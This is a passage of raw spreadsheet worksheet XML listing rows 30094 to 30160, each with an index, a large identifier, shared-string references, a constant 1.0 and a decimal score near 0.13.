      <c r="A30094" s="1">
        <v>16508.0</v>
      </c>
      <c r="B30094" s="2">
        <v>4.6611548E7</v>
      </c>
      <c r="C30094" s="2" t="s">
        <v>28931</v>
      </c>
      <c r="D30094" s="2">
        <v>1.0</v>
      </c>
      <c r="E30094" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30094" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="30095" ht="15.75" customHeight="1">
      <c r="A30095" s="1">
        <v>16511.0</v>
      </c>
      <c r="B30095" s="2">
        <v>4.6611591E7</v>
      </c>
      <c r="C30095" s="2" t="s">
        <v>28931</v>
      </c>
      <c r="D30095" s="2">
        <v>1.0</v>
      </c>
      <c r="E30095" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30095" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="30096" ht="15.75" customHeight="1">
      <c r="A30096" s="1">
        <v>19332.0</v>
      </c>
      <c r="B30096" s="2">
        <v>5.5325257E7</v>
      </c>
      <c r="C30096" s="2" t="s">
        <v>28932</v>
      </c>
      <c r="D30096" s="2">
        <v>1.0</v>
      </c>
      <c r="E30096" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30096" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="30097" ht="15.75" customHeight="1">
      <c r="A30097" s="1">
        <v>22683.0</v>
      </c>
      <c r="B30097" s="2">
        <v>4.2153345E7</v>
      </c>
      <c r="C30097" s="2" t="s">
        <v>28933</v>
      </c>
      <c r="D30097" s="2">
        <v>1.0</v>
      </c>
      <c r="E30097" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30097" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="30098" ht="15.75" customHeight="1">
      <c r="A30098" s="1">
        <v>25605.0</v>
      </c>
      <c r="B30098" s="2">
        <v>1.439618E7</v>
      </c>
      <c r="C30098" s="2" t="s">
        <v>28934</v>
      </c>
      <c r="D30098" s="2">
        <v>1.0</v>
      </c>
      <c r="E30098" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30098" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="30099" ht="15.75" customHeight="1">
      <c r="A30099" s="1">
        <v>25963.0</v>
      </c>
      <c r="B30099" s="2">
        <v>1.5267996E7</v>
      </c>
      <c r="C30099" s="2" t="s">
        <v>28935</v>
      </c>
      <c r="D30099" s="2">
        <v>1.0</v>
      </c>
      <c r="E30099" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30099" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="30100" ht="15.75" customHeight="1">
      <c r="A30100" s="1">
        <v>30658.0</v>
      </c>
      <c r="B30100" s="2">
        <v>4.2153344E7</v>
      </c>
      <c r="C30100" s="2" t="s">
        <v>28933</v>
      </c>
      <c r="D30100" s="2">
        <v>1.0</v>
      </c>
      <c r="E30100" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30100" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="30101" ht="15.75" customHeight="1">
      <c r="A30101" s="1">
        <v>34139.0</v>
      </c>
      <c r="B30101" s="2">
        <v>9801632.0</v>
      </c>
      <c r="C30101" s="2" t="s">
        <v>28936</v>
      </c>
      <c r="D30101" s="2">
        <v>1.0</v>
      </c>
      <c r="E30101" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30101" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="30102" ht="15.75" customHeight="1">
      <c r="A30102" s="1">
        <v>24839.0</v>
      </c>
      <c r="B30102" s="2">
        <v>1.2173703E7</v>
      </c>
      <c r="C30102" s="2" t="s">
        <v>28937</v>
      </c>
      <c r="D30102" s="2">
        <v>1.0</v>
      </c>
      <c r="E30102" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30102" s="2">
        <v>0.1301824212271974</v>
      </c>
    </row>
    <row r="30103" ht="15.75" customHeight="1">
      <c r="A30103" s="1">
        <v>11665.0</v>
      </c>
      <c r="B30103" s="2">
        <v>2.3343054E7</v>
      </c>
      <c r="C30103" s="2" t="s">
        <v>28938</v>
      </c>
      <c r="D30103" s="2">
        <v>1.0</v>
      </c>
      <c r="E30103" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30103" s="2">
        <v>0.1299603174603174</v>
      </c>
    </row>
    <row r="30104" ht="15.75" customHeight="1">
      <c r="A30104" s="1">
        <v>10213.0</v>
      </c>
      <c r="B30104" s="2">
        <v>5.7434949E7</v>
      </c>
      <c r="C30104" s="2" t="s">
        <v>28939</v>
      </c>
      <c r="D30104" s="2">
        <v>1.0</v>
      </c>
      <c r="E30104" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30104" s="2">
        <v>0.1299283154121864</v>
      </c>
    </row>
    <row r="30105" ht="15.75" customHeight="1">
      <c r="A30105" s="1">
        <v>23033.0</v>
      </c>
      <c r="B30105" s="2">
        <v>5.008071E7</v>
      </c>
      <c r="C30105" s="2" t="s">
        <v>28940</v>
      </c>
      <c r="D30105" s="2">
        <v>1.0</v>
      </c>
      <c r="E30105" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30105" s="2">
        <v>0.1299283154121864</v>
      </c>
    </row>
    <row r="30106" ht="15.75" customHeight="1">
      <c r="A30106" s="1">
        <v>26815.0</v>
      </c>
      <c r="B30106" s="2">
        <v>1.8750676E7</v>
      </c>
      <c r="C30106" s="2" t="s">
        <v>28941</v>
      </c>
      <c r="D30106" s="2">
        <v>1.0</v>
      </c>
      <c r="E30106" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30106" s="2">
        <v>0.1299283154121864</v>
      </c>
    </row>
    <row r="30107" ht="15.75" customHeight="1">
      <c r="A30107" s="1">
        <v>8182.0</v>
      </c>
      <c r="B30107" s="2">
        <v>5.3243651E7</v>
      </c>
      <c r="C30107" s="2" t="s">
        <v>28942</v>
      </c>
      <c r="D30107" s="2">
        <v>1.0</v>
      </c>
      <c r="E30107" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30107" s="2">
        <v>0.1298449612403101</v>
      </c>
    </row>
    <row r="30108" ht="15.75" customHeight="1">
      <c r="A30108" s="1">
        <v>96.0</v>
      </c>
      <c r="B30108" s="2">
        <v>1.2320004E7</v>
      </c>
      <c r="C30108" s="2" t="s">
        <v>28943</v>
      </c>
      <c r="D30108" s="2">
        <v>1.0</v>
      </c>
      <c r="E30108" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30108" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="30109" ht="15.75" customHeight="1">
      <c r="A30109" s="1">
        <v>2501.0</v>
      </c>
      <c r="B30109" s="2">
        <v>3.393992E7</v>
      </c>
      <c r="C30109" s="2" t="s">
        <v>28944</v>
      </c>
      <c r="D30109" s="2">
        <v>1.0</v>
      </c>
      <c r="E30109" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30109" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="30110" ht="15.75" customHeight="1">
      <c r="A30110" s="1">
        <v>5778.0</v>
      </c>
      <c r="B30110" s="2">
        <v>4.6736158E7</v>
      </c>
      <c r="C30110" s="2" t="s">
        <v>28945</v>
      </c>
      <c r="D30110" s="2">
        <v>1.0</v>
      </c>
      <c r="E30110" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30110" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="30111" ht="15.75" customHeight="1">
      <c r="A30111" s="1">
        <v>6840.0</v>
      </c>
      <c r="B30111" s="2">
        <v>4.9618018E7</v>
      </c>
      <c r="C30111" s="2" t="s">
        <v>28946</v>
      </c>
      <c r="D30111" s="2">
        <v>1.0</v>
      </c>
      <c r="E30111" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30111" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="30112" ht="15.75" customHeight="1">
      <c r="A30112" s="1">
        <v>13776.0</v>
      </c>
      <c r="B30112" s="2">
        <v>3.6554862E7</v>
      </c>
      <c r="C30112" s="2" t="s">
        <v>28947</v>
      </c>
      <c r="D30112" s="2">
        <v>1.0</v>
      </c>
      <c r="E30112" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30112" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="30113" ht="15.75" customHeight="1">
      <c r="A30113" s="1">
        <v>15809.0</v>
      </c>
      <c r="B30113" s="2">
        <v>4.4249334E7</v>
      </c>
      <c r="C30113" s="2" t="s">
        <v>28948</v>
      </c>
      <c r="D30113" s="2">
        <v>1.0</v>
      </c>
      <c r="E30113" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30113" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="30114" ht="15.75" customHeight="1">
      <c r="A30114" s="1">
        <v>16788.0</v>
      </c>
      <c r="B30114" s="2">
        <v>4.7749061E7</v>
      </c>
      <c r="C30114" s="2" t="s">
        <v>28949</v>
      </c>
      <c r="D30114" s="2">
        <v>1.0</v>
      </c>
      <c r="E30114" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30114" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="30115" ht="15.75" customHeight="1">
      <c r="A30115" s="1">
        <v>21830.0</v>
      </c>
      <c r="B30115" s="2">
        <v>2.6989382E7</v>
      </c>
      <c r="C30115" s="2" t="s">
        <v>28950</v>
      </c>
      <c r="D30115" s="2">
        <v>1.0</v>
      </c>
      <c r="E30115" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30115" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="30116" ht="15.75" customHeight="1">
      <c r="A30116" s="1">
        <v>24336.0</v>
      </c>
      <c r="B30116" s="2">
        <v>1.0708494E7</v>
      </c>
      <c r="C30116" s="2" t="s">
        <v>28951</v>
      </c>
      <c r="D30116" s="2">
        <v>1.0</v>
      </c>
      <c r="E30116" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30116" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="30117" ht="15.75" customHeight="1">
      <c r="A30117" s="1">
        <v>25087.0</v>
      </c>
      <c r="B30117" s="2">
        <v>1.2881841E7</v>
      </c>
      <c r="C30117" s="2" t="s">
        <v>28952</v>
      </c>
      <c r="D30117" s="2">
        <v>1.0</v>
      </c>
      <c r="E30117" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30117" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="30118" ht="15.75" customHeight="1">
      <c r="A30118" s="1">
        <v>27784.0</v>
      </c>
      <c r="B30118" s="2">
        <v>2.3128113E7</v>
      </c>
      <c r="C30118" s="2" t="s">
        <v>28953</v>
      </c>
      <c r="D30118" s="2">
        <v>1.0</v>
      </c>
      <c r="E30118" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30118" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="30119" ht="15.75" customHeight="1">
      <c r="A30119" s="1">
        <v>28595.0</v>
      </c>
      <c r="B30119" s="2">
        <v>2.6989381E7</v>
      </c>
      <c r="C30119" s="2" t="s">
        <v>28950</v>
      </c>
      <c r="D30119" s="2">
        <v>1.0</v>
      </c>
      <c r="E30119" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30119" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="30120" ht="15.75" customHeight="1">
      <c r="A30120" s="1">
        <v>30387.0</v>
      </c>
      <c r="B30120" s="2">
        <v>3.8569441E7</v>
      </c>
      <c r="C30120" s="2" t="s">
        <v>28954</v>
      </c>
      <c r="D30120" s="2">
        <v>1.0</v>
      </c>
      <c r="E30120" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30120" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="30121" ht="15.75" customHeight="1">
      <c r="A30121" s="1">
        <v>32075.0</v>
      </c>
      <c r="B30121" s="2">
        <v>5.3816511E7</v>
      </c>
      <c r="C30121" s="2" t="s">
        <v>28955</v>
      </c>
      <c r="D30121" s="2">
        <v>1.0</v>
      </c>
      <c r="E30121" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30121" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="30122" ht="15.75" customHeight="1">
      <c r="A30122" s="1">
        <v>33631.0</v>
      </c>
      <c r="B30122" s="2">
        <v>8358116.0</v>
      </c>
      <c r="C30122" s="2" t="s">
        <v>28956</v>
      </c>
      <c r="D30122" s="2">
        <v>1.0</v>
      </c>
      <c r="E30122" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30122" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="30123" ht="15.75" customHeight="1">
      <c r="A30123" s="1">
        <v>29761.0</v>
      </c>
      <c r="B30123" s="2">
        <v>3.4815502E7</v>
      </c>
      <c r="C30123" s="2" t="s">
        <v>28957</v>
      </c>
      <c r="D30123" s="2">
        <v>1.0</v>
      </c>
      <c r="E30123" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30123" s="2">
        <v>0.1296296296296296</v>
      </c>
    </row>
    <row r="30124" ht="15.75" customHeight="1">
      <c r="A30124" s="1">
        <v>25074.0</v>
      </c>
      <c r="B30124" s="2">
        <v>1.2881585E7</v>
      </c>
      <c r="C30124" s="2" t="s">
        <v>28958</v>
      </c>
      <c r="D30124" s="2">
        <v>1.0</v>
      </c>
      <c r="E30124" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30124" s="2">
        <v>0.1293402777777778</v>
      </c>
    </row>
    <row r="30125" ht="15.75" customHeight="1">
      <c r="A30125" s="1">
        <v>18685.0</v>
      </c>
      <c r="B30125" s="2">
        <v>5.3592645E7</v>
      </c>
      <c r="C30125" s="2" t="s">
        <v>28959</v>
      </c>
      <c r="D30125" s="2">
        <v>1.0</v>
      </c>
      <c r="E30125" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30125" s="2">
        <v>0.1293103448275862</v>
      </c>
    </row>
    <row r="30126" ht="15.75" customHeight="1">
      <c r="A30126" s="1">
        <v>19827.0</v>
      </c>
      <c r="B30126" s="2">
        <v>5.7040593E7</v>
      </c>
      <c r="C30126" s="2" t="s">
        <v>28960</v>
      </c>
      <c r="D30126" s="2">
        <v>1.0</v>
      </c>
      <c r="E30126" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30126" s="2">
        <v>0.1293103448275862</v>
      </c>
    </row>
    <row r="30127" ht="15.75" customHeight="1">
      <c r="A30127" s="1">
        <v>22550.0</v>
      </c>
      <c r="B30127" s="2">
        <v>3.8215278E7</v>
      </c>
      <c r="C30127" s="2" t="s">
        <v>28961</v>
      </c>
      <c r="D30127" s="2">
        <v>1.0</v>
      </c>
      <c r="E30127" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30127" s="2">
        <v>0.1293103448275862</v>
      </c>
    </row>
    <row r="30128" ht="15.75" customHeight="1">
      <c r="A30128" s="1">
        <v>33110.0</v>
      </c>
      <c r="B30128" s="2">
        <v>6959208.0</v>
      </c>
      <c r="C30128" s="2" t="s">
        <v>28962</v>
      </c>
      <c r="D30128" s="2">
        <v>1.0</v>
      </c>
      <c r="E30128" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30128" s="2">
        <v>0.1293103448275862</v>
      </c>
    </row>
    <row r="30129" ht="15.75" customHeight="1">
      <c r="A30129" s="1">
        <v>14478.0</v>
      </c>
      <c r="B30129" s="2">
        <v>3.9534926E7</v>
      </c>
      <c r="C30129" s="2" t="s">
        <v>28963</v>
      </c>
      <c r="D30129" s="2">
        <v>1.0</v>
      </c>
      <c r="E30129" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30129" s="2">
        <v>0.1290018832391714</v>
      </c>
    </row>
    <row r="30130" ht="15.75" customHeight="1">
      <c r="A30130" s="1">
        <v>28047.0</v>
      </c>
      <c r="B30130" s="2">
        <v>2.4544786E7</v>
      </c>
      <c r="C30130" s="2" t="s">
        <v>28964</v>
      </c>
      <c r="D30130" s="2">
        <v>1.0</v>
      </c>
      <c r="E30130" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30130" s="2">
        <v>0.1290018832391714</v>
      </c>
    </row>
    <row r="30131" ht="15.75" customHeight="1">
      <c r="A30131" s="1">
        <v>17430.0</v>
      </c>
      <c r="B30131" s="2">
        <v>4.973193E7</v>
      </c>
      <c r="C30131" s="2" t="s">
        <v>28965</v>
      </c>
      <c r="D30131" s="2">
        <v>1.0</v>
      </c>
      <c r="E30131" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30131" s="2">
        <v>0.1287878787878788</v>
      </c>
    </row>
    <row r="30132" ht="15.75" customHeight="1">
      <c r="A30132" s="1">
        <v>13535.0</v>
      </c>
      <c r="B30132" s="2">
        <v>3.5600933E7</v>
      </c>
      <c r="C30132" s="2" t="s">
        <v>28966</v>
      </c>
      <c r="D30132" s="2">
        <v>1.0</v>
      </c>
      <c r="E30132" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30132" s="2">
        <v>0.1287037037037037</v>
      </c>
    </row>
    <row r="30133" ht="15.75" customHeight="1">
      <c r="A30133" s="1">
        <v>34012.0</v>
      </c>
      <c r="B30133" s="2">
        <v>9512074.0</v>
      </c>
      <c r="C30133" s="2" t="s">
        <v>28967</v>
      </c>
      <c r="D30133" s="2">
        <v>1.0</v>
      </c>
      <c r="E30133" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30133" s="2">
        <v>0.1287037037037037</v>
      </c>
    </row>
    <row r="30134" ht="15.75" customHeight="1">
      <c r="A30134" s="1">
        <v>14340.0</v>
      </c>
      <c r="B30134" s="2">
        <v>3.8817836E7</v>
      </c>
      <c r="C30134" s="2" t="s">
        <v>28968</v>
      </c>
      <c r="D30134" s="2">
        <v>1.0</v>
      </c>
      <c r="E30134" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30134" s="2">
        <v>0.1284153005464481</v>
      </c>
    </row>
    <row r="30135" ht="15.75" customHeight="1">
      <c r="A30135" s="1">
        <v>24191.0</v>
      </c>
      <c r="B30135" s="2">
        <v>1.0285305E7</v>
      </c>
      <c r="C30135" s="2" t="s">
        <v>28969</v>
      </c>
      <c r="D30135" s="2">
        <v>1.0</v>
      </c>
      <c r="E30135" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30135" s="2">
        <v>0.1284153005464481</v>
      </c>
    </row>
    <row r="30136" ht="15.75" customHeight="1">
      <c r="A30136" s="1">
        <v>25008.0</v>
      </c>
      <c r="B30136" s="2">
        <v>1.2725923E7</v>
      </c>
      <c r="C30136" s="2" t="s">
        <v>28970</v>
      </c>
      <c r="D30136" s="2">
        <v>1.0</v>
      </c>
      <c r="E30136" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30136" s="2">
        <v>0.1284153005464481</v>
      </c>
    </row>
    <row r="30137" ht="15.75" customHeight="1">
      <c r="A30137" s="1">
        <v>15035.0</v>
      </c>
      <c r="B30137" s="2">
        <v>4.1563662E7</v>
      </c>
      <c r="C30137" s="2" t="s">
        <v>28971</v>
      </c>
      <c r="D30137" s="2">
        <v>1.0</v>
      </c>
      <c r="E30137" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30137" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="30138" ht="15.75" customHeight="1">
      <c r="A30138" s="1">
        <v>16157.0</v>
      </c>
      <c r="B30138" s="2">
        <v>4.5577814E7</v>
      </c>
      <c r="C30138" s="2" t="s">
        <v>28972</v>
      </c>
      <c r="D30138" s="2">
        <v>1.0</v>
      </c>
      <c r="E30138" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30138" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="30139" ht="15.75" customHeight="1">
      <c r="A30139" s="1">
        <v>17052.0</v>
      </c>
      <c r="B30139" s="2">
        <v>4.8539018E7</v>
      </c>
      <c r="C30139" s="2" t="s">
        <v>28973</v>
      </c>
      <c r="D30139" s="2">
        <v>1.0</v>
      </c>
      <c r="E30139" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30139" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="30140" ht="15.75" customHeight="1">
      <c r="A30140" s="1">
        <v>19171.0</v>
      </c>
      <c r="B30140" s="2">
        <v>5.4970251E7</v>
      </c>
      <c r="C30140" s="2" t="s">
        <v>28974</v>
      </c>
      <c r="D30140" s="2">
        <v>1.0</v>
      </c>
      <c r="E30140" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30140" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="30141" ht="15.75" customHeight="1">
      <c r="A30141" s="1">
        <v>20088.0</v>
      </c>
      <c r="B30141" s="2">
        <v>938394.0</v>
      </c>
      <c r="C30141" s="2" t="s">
        <v>28975</v>
      </c>
      <c r="D30141" s="2">
        <v>1.0</v>
      </c>
      <c r="E30141" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30141" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="30142" ht="15.75" customHeight="1">
      <c r="A30142" s="1">
        <v>28218.0</v>
      </c>
      <c r="B30142" s="2">
        <v>2.5054952E7</v>
      </c>
      <c r="C30142" s="2" t="s">
        <v>28976</v>
      </c>
      <c r="D30142" s="2">
        <v>1.0</v>
      </c>
      <c r="E30142" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30142" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="30143" ht="15.75" customHeight="1">
      <c r="A30143" s="1">
        <v>31426.0</v>
      </c>
      <c r="B30143" s="2">
        <v>5.0134747E7</v>
      </c>
      <c r="C30143" s="2" t="s">
        <v>28977</v>
      </c>
      <c r="D30143" s="2">
        <v>1.0</v>
      </c>
      <c r="E30143" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30143" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="30144" ht="15.75" customHeight="1">
      <c r="A30144" s="1">
        <v>795.0</v>
      </c>
      <c r="B30144" s="2">
        <v>2.1228484E7</v>
      </c>
      <c r="C30144" s="2" t="s">
        <v>28978</v>
      </c>
      <c r="D30144" s="2">
        <v>1.0</v>
      </c>
      <c r="E30144" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30144" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="30145" ht="15.75" customHeight="1">
      <c r="A30145" s="1">
        <v>802.0</v>
      </c>
      <c r="B30145" s="2">
        <v>2.1289539E7</v>
      </c>
      <c r="C30145" s="2" t="s">
        <v>28979</v>
      </c>
      <c r="D30145" s="2">
        <v>1.0</v>
      </c>
      <c r="E30145" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30145" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="30146" ht="15.75" customHeight="1">
      <c r="A30146" s="1">
        <v>1348.0</v>
      </c>
      <c r="B30146" s="2">
        <v>2.5952328E7</v>
      </c>
      <c r="C30146" s="2" t="s">
        <v>28980</v>
      </c>
      <c r="D30146" s="2">
        <v>1.0</v>
      </c>
      <c r="E30146" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30146" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="30147" ht="15.75" customHeight="1">
      <c r="A30147" s="1">
        <v>2077.0</v>
      </c>
      <c r="B30147" s="2">
        <v>3.1143593E7</v>
      </c>
      <c r="C30147" s="2" t="s">
        <v>28981</v>
      </c>
      <c r="D30147" s="2">
        <v>1.0</v>
      </c>
      <c r="E30147" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30147" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="30148" ht="15.75" customHeight="1">
      <c r="A30148" s="1">
        <v>2383.0</v>
      </c>
      <c r="B30148" s="2">
        <v>3.3323038E7</v>
      </c>
      <c r="C30148" s="2" t="s">
        <v>28982</v>
      </c>
      <c r="D30148" s="2">
        <v>1.0</v>
      </c>
      <c r="E30148" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30148" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="30149" ht="15.75" customHeight="1">
      <c r="A30149" s="1">
        <v>3421.0</v>
      </c>
      <c r="B30149" s="2">
        <v>3.8155825E7</v>
      </c>
      <c r="C30149" s="2" t="s">
        <v>28983</v>
      </c>
      <c r="D30149" s="2">
        <v>1.0</v>
      </c>
      <c r="E30149" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30149" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="30150" ht="15.75" customHeight="1">
      <c r="A30150" s="1">
        <v>5214.0</v>
      </c>
      <c r="B30150" s="2">
        <v>4.4940143E7</v>
      </c>
      <c r="C30150" s="2" t="s">
        <v>28984</v>
      </c>
      <c r="D30150" s="2">
        <v>1.0</v>
      </c>
      <c r="E30150" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30150" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="30151" ht="15.75" customHeight="1">
      <c r="A30151" s="1">
        <v>5509.0</v>
      </c>
      <c r="B30151" s="2">
        <v>4.5836528E7</v>
      </c>
      <c r="C30151" s="2" t="s">
        <v>28985</v>
      </c>
      <c r="D30151" s="2">
        <v>1.0</v>
      </c>
      <c r="E30151" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30151" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="30152" ht="15.75" customHeight="1">
      <c r="A30152" s="1">
        <v>5678.0</v>
      </c>
      <c r="B30152" s="2">
        <v>4.6372214E7</v>
      </c>
      <c r="C30152" s="2" t="s">
        <v>28986</v>
      </c>
      <c r="D30152" s="2">
        <v>1.0</v>
      </c>
      <c r="E30152" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30152" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="30153" ht="15.75" customHeight="1">
      <c r="A30153" s="1">
        <v>5995.0</v>
      </c>
      <c r="B30153" s="2">
        <v>4.7452662E7</v>
      </c>
      <c r="C30153" s="2" t="s">
        <v>28987</v>
      </c>
      <c r="D30153" s="2">
        <v>1.0</v>
      </c>
      <c r="E30153" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30153" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="30154" ht="15.75" customHeight="1">
      <c r="A30154" s="1">
        <v>6535.0</v>
      </c>
      <c r="B30154" s="2">
        <v>4.8834181E7</v>
      </c>
      <c r="C30154" s="2" t="s">
        <v>28988</v>
      </c>
      <c r="D30154" s="2">
        <v>1.0</v>
      </c>
      <c r="E30154" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30154" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="30155" ht="15.75" customHeight="1">
      <c r="A30155" s="1">
        <v>8965.0</v>
      </c>
      <c r="B30155" s="2">
        <v>5.4927969E7</v>
      </c>
      <c r="C30155" s="2" t="s">
        <v>28989</v>
      </c>
      <c r="D30155" s="2">
        <v>1.0</v>
      </c>
      <c r="E30155" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30155" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="30156" ht="15.75" customHeight="1">
      <c r="A30156" s="1">
        <v>9213.0</v>
      </c>
      <c r="B30156" s="2">
        <v>5.5426593E7</v>
      </c>
      <c r="C30156" s="2" t="s">
        <v>28990</v>
      </c>
      <c r="D30156" s="2">
        <v>1.0</v>
      </c>
      <c r="E30156" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30156" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="30157" ht="15.75" customHeight="1">
      <c r="A30157" s="1">
        <v>9732.0</v>
      </c>
      <c r="B30157" s="2">
        <v>5.6444558E7</v>
      </c>
      <c r="C30157" s="2" t="s">
        <v>28991</v>
      </c>
      <c r="D30157" s="2">
        <v>1.0</v>
      </c>
      <c r="E30157" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30157" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="30158" ht="15.75" customHeight="1">
      <c r="A30158" s="1">
        <v>13432.0</v>
      </c>
      <c r="B30158" s="2">
        <v>3.5094491E7</v>
      </c>
      <c r="C30158" s="2" t="s">
        <v>28992</v>
      </c>
      <c r="D30158" s="2">
        <v>1.0</v>
      </c>
      <c r="E30158" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30158" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="30159" ht="15.75" customHeight="1">
      <c r="A30159" s="1">
        <v>13895.0</v>
      </c>
      <c r="B30159" s="2">
        <v>3.7033913E7</v>
      </c>
      <c r="C30159" s="2" t="s">
        <v>28993</v>
      </c>
      <c r="D30159" s="2">
        <v>1.0</v>
      </c>
      <c r="E30159" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30159" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="30160" ht="15.75" customHeight="1">
      <c r="A30160" s="1">
        <v>14692.0</v>
      </c>
      <c r="B30160" s="2">
        <v>4.0542555E7</v>
      </c>
      <c r="C30160" s="2" t="s">
        <v>28994</v>
      </c>
      <c r="D30160" s="2">
        <v>1.0</v>
      </c>
      <c r="E30160" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30160" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="30161" ht="15.75" customHeight="1">
